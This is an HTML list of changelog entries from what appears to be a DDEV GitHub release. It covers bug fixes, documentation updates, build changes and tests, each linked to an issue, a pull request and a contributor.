<li>fix: add timeout for netutil::IsPortActive check for WSL2 with "mirrored networking mode" as opposed to default "NAT mode", fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2316809262" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6245" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6245/hovercard" href="https://github.com/ddev/ddev/issues/6245">#6245</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvinhinz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvinhinz">@marvinhinz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2956964244" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7166" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7166/hovercard" href="https://github.com/ddev/ddev/pull/7166">#7166</a></li>
<li>fix: nginx.conf should let index.php handle 404 errors for media files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barbieswimcrew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barbieswimcrew">@barbieswimcrew</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2898378404" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7050" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7050/hovercard" href="https://github.com/ddev/ddev/pull/7050">#7050</a></li>
<li>docs: Explain corp vpn and proxy, fixup FAQ, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2897590337" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7048" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7048/hovercard" href="https://github.com/ddev/ddev/issues/7048">#7048</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2905867267" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7061" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7061/hovercard" href="https://github.com/ddev/ddev/pull/7061">#7061</a></li>
<li>build: stop installing chocolatey, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2606079671" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6636" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6636/hovercard" href="https://github.com/ddev/ddev/issues/6636">#6636</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2370918816" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6344" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6344/hovercard" href="https://github.com/ddev/ddev/issues/6344">#6344</a> [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/colans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/colans">@colans</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2897793508" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7049" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7049/hovercard" href="https://github.com/ddev/ddev/pull/7049">#7049</a></li>
<li>fix: XHGui launch command support custom ports, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2964018788" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7181" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7181/hovercard" href="https://github.com/ddev/ddev/issues/7181">#7181</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PierrePaul/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PierrePaul">@PierrePaul</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2964914215" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7182" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7182/hovercard" href="https://github.com/ddev/ddev/pull/7182">#7182</a></li>
<li>test: fix for magento2 quickstart and bats test, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2980199111" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7191" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7191/hovercard" href="https://github.com/ddev/ddev/issues/7191">#7191</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2980957223" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7192" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7192/hovercard" href="https://github.com/ddev/ddev/pull/7192">#7192</a></li>
<li>docs: fix minor typo in the Grav quickstart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jgonyea/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jgonyea">@jgonyea</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2986705751" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7197" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7197/hovercard" href="https://github.com/ddev/ddev/pull/7197">#7197</a></li>
<li>refactor: move <code>WP_ENVIRONMENT_TYPE</code> to the docs, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2963592470" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7178" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7178/hovercard" href="https://github.com/ddev/ddev/issues/7178">#7178</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2963744313" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7179" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7179/hovercard" href="https://github.com/ddev/ddev/pull/7179">#7179</a></li>
<li>fix: make <code>ddev config</code> work with project name from <code>config.*.yaml</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2905581166" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7060" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7060/hovercard" href="https://github.com/ddev/ddev/issues/7060">#7060</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2907369708" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7062" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7062/hovercard" href="https://github.com/ddev/ddev/pull/7062">#7062</a></li>
<li>docs: Improve buildkite windows setup script run [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2987293359" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7200" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7200/hovercard" href="https://github.com/ddev/ddev/pull/7200">#7200</a></li>
<li>fix: make sure mutagen agents file is fresh on upgrade, add shasum testing, test shasum for mutagen+docker-compose by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918082971" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7077" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7077/hovercard" href="https://github.com/ddev/ddev/pull/7077">#7077</a></li>
<li>test: make the drupal cms bats test a bit more robust and trustworthy by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2990026326" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7203" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7203/hovercard" href="https://github.com/ddev/ddev/pull/7203">#7203</a></li>
<li>feat: add DDEV_APPROOT variable to web container and updates documentation, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2987034398" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7198" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7198/hovercard" href="https://github.com/ddev/ddev/issues/7198">#7198</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shelane/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shelane">@shelane</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2987065675" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7199" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7199/hovercard" href="https://github.com/ddev/ddev/pull/7199">#7199</a></li>
<li>build: switch to official percona release for xtrabackup, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2834241545" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6963" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6963/hovercard" href="https://github.com/ddev/ddev/issues/6963">#6963</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2990935275" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7207" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7207/hovercard" href="https://github.com/ddev/ddev/pull/7207">#7207</a></li>
<li>fix: disable xdebug trigger for xdebug and xhprof status checks, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2299024728" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6191" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6191/hovercard" href="https://github.com/ddev/ddev/issues/6191">#6191</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3002840728" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev-intellij-plugin/issues/414" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev-intellij-plugin/issues/414/hovercard" href="https://github.com/ddev/ddev-intellij-plugin/issues/414">ddev/ddev-intellij-plugin#414</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3003476644" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7216" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7216/hovercard" href="https://github.com/ddev/ddev/pull/7216">#7216</a></li>
<li>fix: Use fast checkpoint during postgresql backup, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923157621" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7098" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7098/hovercard" href="https://github.com/ddev/ddev/issues/7098">#7098</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3006024304" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7219" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7219/hovercard" href="https://github.com/ddev/ddev/pull/7219">#7219</a></li>
<li>feat: add new envs <code>DDEV_PRIMARY_URL_PORT</code>, <code>DDEV_PRIMARY_URL_WITHOUT_PORT</code> and <code>DDEV_SCHEME</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3002419194" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7214" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7214/hovercard" href="https://github.com/ddev/ddev/issues/7214">#7214</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3005935511" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7218" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7218/hovercard" href="https://github.com/ddev/ddev/pull/7218">#7218</a></li>
<li>feat: support prepend.Dockerfile* files for multi-stage builds by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanoii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanoii">@hanoii</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2914900395" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7071" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7071/hovercard" href="https://github.com/ddev/ddev/pull/7071">#7071</a></li>
<li>fix: Improve the output of ArrayToReadableOutput by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3011621267" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7222" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7222/hovercard" href="https://github.com/ddev/ddev/pull/7222">#7222</a></li>
<li>docs: Improvements to Zscaler instructions, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2993382357" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7209" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7209/hovercard" href="https://github.com/ddev/ddev/issues/7209">#7209</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2998958710" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7211" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7211/hovercard" href="https://github.com/ddev/ddev/issues/7211">#7211</a> [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2999744305" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7212" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7212/hovercard" href="https://github.com/ddev/ddev/pull/7212">#7212</a></li>
<li>test: Add TestUploadDirs to verify upload_dirs, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2925681630" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7109" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7109/hovercard" href="https://github.com/ddev/ddev/issues/7109">#7109</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3015118449" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7224" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7224/hovercard" href="https://github.com/ddev/ddev/pull/7224">#7224</a></li>
<li>feat: add success message for xhgui on and off, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2990011739" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7202" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7202/hovercard" href="https://github.com/ddev/ddev/issues/7202">#7202</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2990725102" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7205" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7205/hovercard" href="https://github.com/ddev/ddev/pull/7205">#7205</a></li>
<li>refactor: Hide ddev debug capabilities, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2960861536" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7174" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7174/hovercard" href="https://github.com/ddev/ddev/issues/7174">#7174</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3017716639" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7227" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7227/hovercard" href="https://github.com/ddev/ddev/pull/7227">#7227</a></li>
<li>refactor: check for docroot/index.* on start, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2954375049" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7157" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7157/hovercard" href="https://github.com/ddev/ddev/issues/7157">#7157</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3017815439" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7228" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7228/hovercard" href="https://github.com/ddev/ddev/pull/7228">#7228</a></li>
<li>build: bump actions/setup-python from 5.5.0 to 5.6.0 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3025471407" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7240" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7240/hovercard" href="https://github.com/ddev/ddev/pull/7240">#7240</a></li>
<li>docs: use ddev composer create-project everywhere, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2800339972" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6920" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6920/hovercard" href="https://github.com/ddev/ddev/issues/6920">#6920</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3018199525" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7231" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7231/hovercard" href="https://github.com/ddev/ddev/pull/7231">#7231</a></li>
<li>refactor: Add retries to util.Download(), both the SHASUM and the target file by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3020419256" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7234" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7234/hovercard" href="https://github.com/ddev/ddev/pull/7234">#7234</a></li>
<li>build: Use some artifacts that we control building windows installer (nsis), fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2920271324" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7086" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7086/hovercard" href="https://github.com/ddev/ddev/issues/7086">#7086</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3018104244" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7229" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7229/hovercard" href="https://github.com/ddev/ddev/pull/7229">#7229</a></li>
<li>test: add timeout to buildkite maintenance, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2962770375" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7176" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7176/hovercard" href="https://github.com/ddev/ddev/issues/7176">#7176</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3017669802" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7226" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7226/hovercard" href="https://github.com/ddev/ddev/pull/7226">#7226</a></li>
<li>docs: wrap quotes around commands that use the caret symbol by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nmangold/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nmangold">@nmangold</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3023575382" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7237" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7237/hovercard" href="https://github.com/ddev/ddev/pull/7237">#7237</a></li>
<li>docs: Remove --no-interaction from Pimcore, disable test, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3031692921" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7243" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7243/hovercard" href="https://github.com/ddev/ddev/issues/7243">#7243</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3032181611" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7245" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7245/hovercard" href="https://github.com/ddev/ddev/pull/7245">#7245</a></li>
<li>fix: support TYPO3 v14 nginx configuration, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2817903800" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6944" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6944/hovercard" href="https://github.com/ddev/ddev/issues/6944">#6944</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3018159918" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7230" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7230/hovercard" href="https://github.com/ddev/ddev/pull/7230">#7230</a></li>
<li>build: Reject the use of <code>drud/ddev/ddev</code> homebrew recipe by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3032141005" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7244" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7244/hovercard" href="https://github.com/ddev/ddev/pull/7244">#7244</a></li>
<li>build: bump golangci/golangci-lint-action from 7 to 8 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3040089297" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7264" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7264/hovercard" href="https://github.com/ddev/ddev/pull/7264">#7264</a></li>
<li>fix: add BASE_IMAGE arg before everything else, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2914900395" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7071" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7071/hovercard" href="https://github.com/ddev/ddev/pull/7071">#7071</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanoii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanoii">@hanoii</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3037161480" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7258" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7258/hovercard" href="https://github.com/ddev/ddev/pull/7258">#7258</a></li>
<li>fix: allow status code 429 for linkspector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3043168848" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7270" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7270/hovercard" href="https://github.com/ddev/ddev/pull/7270">#7270</a></li>
<li>fix: WSL2 install script should wait longer for DDEV Windows installer to complete [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3043033565" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7269" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7269/hovercard" href="https://github.com/ddev/ddev/pull/7269">#7269</a></li>
<li>refactor: Make DownloadFile() retry logic more robust, improve curling in Makefile by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3034892050" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7252" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7252/hovercard" href="https://github.com/ddev/ddev/pull/7252">#7252</a></li>
<li>fix: correct warning output formatting (Drupal) and don't try to do exec when not running by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3033793138" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7247" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7247/hovercard" href="https://github.com/ddev/ddev/pull/7247">#7247</a></li>
